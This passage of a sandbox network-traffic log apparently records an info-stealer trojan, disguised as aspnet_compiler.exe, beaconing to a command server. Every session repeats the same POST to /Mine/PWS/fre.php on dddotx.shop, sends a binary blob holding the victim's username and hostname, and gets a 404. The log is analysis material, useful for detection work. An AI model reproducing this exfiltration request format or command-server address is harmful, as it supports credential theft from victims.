Sep 25, 2024 15:30:19.199856043 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:19.925561905 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1u8IGhvgWyjhBseK%2FwiAxUHc2VKiV4Behkp1PlnWUhsX2%2Bq%2F1%2F7YU4gFPksSLrjtfrKhCkWOz34r0BZ0vSlxKMHuCc7sbB5QG%2Bgs%2FYldrYZJOkR2EURU1c7qpQjZgw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e407c450f89-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	55986	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:20.089766979 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:20.095707893 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:21.354742050 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i3ClZajjkQSsMULnANdt8VOnMPk0SfIuJfrt6wKTh3RnhxS950dIB%2FFZMSSWTTw442HMevCgLFQ0BOAerKe9aLhz58wBbl57rweZN1R45k9s%2B6xTKVxcqXLS%2FJltwQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e461b2819ff-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Sep 25, 2024 15:30:21.354896069 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i3ClZajjkQSsMULnANdt8VOnMPk0SfIuJfrt6wKTh3RnhxS950dIB%2FFZMSSWTTw442HMevCgLFQ0BOAerKe9aLhz58wBbl57rweZN1R45k9s%2B6xTKVxcqXLS%2FJltwQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e461b2819ff-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	55987	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:21.502037048 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:21.507010937 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:22.975692987 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnoBuli1KhNTBCVJXad04WA57t6rBO3BmdRs7XnwClcoUXs764U%2FOy61Ak3%2FMgXX5zDQD67S0IdYQtiOX2GDfJt4htpoPPEeLN%2FbM%2BKjBTD1hrNjljRWa2gY%2BU%2FroA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e4eea8a4304-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Sep 25, 2024 15:30:22.977467060 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnoBuli1KhNTBCVJXad04WA57t6rBO3BmdRs7XnwClcoUXs764U%2FOy61Ak3%2FMgXX5zDQD67S0IdYQtiOX2GDfJt4htpoPPEeLN%2FbM%2BKjBTD1hrNjljRWa2gY%2BU%2FroA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e4eea8a4304-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Sep 25, 2024 15:30:22.977809906 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnoBuli1KhNTBCVJXad04WA57t6rBO3BmdRs7XnwClcoUXs764U%2FOy61Ak3%2FMgXX5zDQD67S0IdYQtiOX2GDfJt4htpoPPEeLN%2FbM%2BKjBTD1hrNjljRWa2gY%2BU%2FroA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e4eea8a4304-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	55988	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:23.129600048 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:23.134473085 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:24.171243906 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lslfODFSnBd%2FBVhYRtxsPhy6K02pDv7T32TBi5q9T3LYDz%2BnQXDOwNoLI27wQwMf6JmPWmKUmBdqm%2BuYC8x1RSd720vmMsywQrrwxtg1t8JMeIqRtDVal7yw01jg%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e590fea0ccd-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Sep 25, 2024 15:30:24.173330069 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lslfODFSnBd%2FBVhYRtxsPhy6K02pDv7T32TBi5q9T3LYDz%2BnQXDOwNoLI27wQwMf6JmPWmKUmBdqm%2BuYC8x1RSd720vmMsywQrrwxtg1t8JMeIqRtDVal7yw01jg%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e590fea0ccd-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	55989	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:24.345341921 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:24.350366116 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:25.134206057 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dH38UhiplB%2BKC1guJFoTrPPqv9hzw5u2HlCLKSpCNPZZ4je7XsKE9TaAAP23QE5Qu6PAC1bQg7qmig7zTjtlow8z5P3WvGB8NJgPtcBQaqv1J5whiGsycSJBw2IZg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e60cb8a8ce6-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	55990	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:25.285468102 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:25.290427923 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:26.009540081 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IGqraZ39hxAzqnvc1fjL7B4Qf0Wwu%2FbUhlgEYgHY1R6psG0TnCIQTf829QaSd8GoB4jfDVFjlRTd0J5AFeQz19oXRNAwknIVKXVPERYWBcJ2c4qiyz%2FekbEjdyDr9w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e66bf1a7d13-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	55991	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:26.163558960 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:26.169979095 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:26.831254005 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FBwcTQcWI8shv%2BlA%2F0avvtZx3u2ONid8f7hG3sSZQEzgbYPWFyEXA%2FpKv2eQWHyP5o9AcAktLbekrQ0XzF%2B7kQj%2Fig9Kml8HSKQ9eJw2BEDloEDutOKWE0zM3lNEkQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e6c0a070cb2-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	55992	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:26.995888948 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:27.001128912 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:27.737901926 CEST	577	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kI1XESc1wi8jPwRyP84%2FaTmUd%2Fj7GN7vfKV2xCgFs85v5esFnqPZw%2FpB8wNPeWCaP%2FYIVHWNe1THZTA%2FH%2BoHB0ocOXN%2Bsxbrdu7eT9Pf41YbYhiXw9H4%2BlYZz0kGDg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e714c047d0b-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	55993	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:27.894305944 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:27.899264097 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:28.608217955 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3iKez7FxuroCVNRX6FaGNYn9oxH1uAVRcioJs1Dlbfb3QomUEts1S9ZDtFM01tQzQ6RPrjFUnXwVQ7E4NguSVGbjA9yUUHqWslbrVQ68shPtKXISPA6s%2F6X7EOAYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e76ff5578ed-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	55994	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:28.748756886 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:28.753856897 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:29.440074921 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9wbloxdmDJNXRmk9OyVX9iQ%2FEtYsxAY2utKgVavgzCu9SfgETva8mLu1zcbJBw%2BSCPJjafTp36Ck7KxHQbGYgOuve7gt0YsCDh442%2B20leZLDCWZjv6LSaoLeB%2FWJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e7c2cda1799-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	55995	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:29.609441042 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:29.618077993 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:30.271070004 CEST	561	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hodOlnVk3u1i1qXWzCSAoHFe56cWXGQa3ddr2hNSB9aqGO1fXwZJ5FOriLIiCmKKZx5bjdgi3QtpNOuE8M8AaEYRM8MHxr3ryNVmcDWktmim70Ctfnp0ExIaFkvmxw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e8188c91a13-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	55996	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:30.423810005 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:30.428677082 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:31.121346951 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltEvnr7FeL1qfB82ayyIpGcfjt9099syS7SswFV3e9JoF2NuOSJY6JpGv2W2jp8EJvYIDr%2BQkGa4v1syw6jabknAS%2FGMY%2FYjLVXB376bq67TV%2FoZ%2FmHdTgJvtVSKOg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e86bf1d42b0-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	55997	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:31.267951965 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:31.273027897 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:31.982772112 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WU21y9%2BryG%2FXStViqGpAf3iblzWtvONAx47m5C4CO%2FYu938%2FlOUH8Bxr7EJwRngQIZQVOeRgjxe3UHLBPVG%2F83oO8LBoWE6d00sZJENB%2BcPYweGZDEOAHrp5YoZrlw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e8c0f638c5f-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	55998	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:32.128866911 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:32.135559082 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
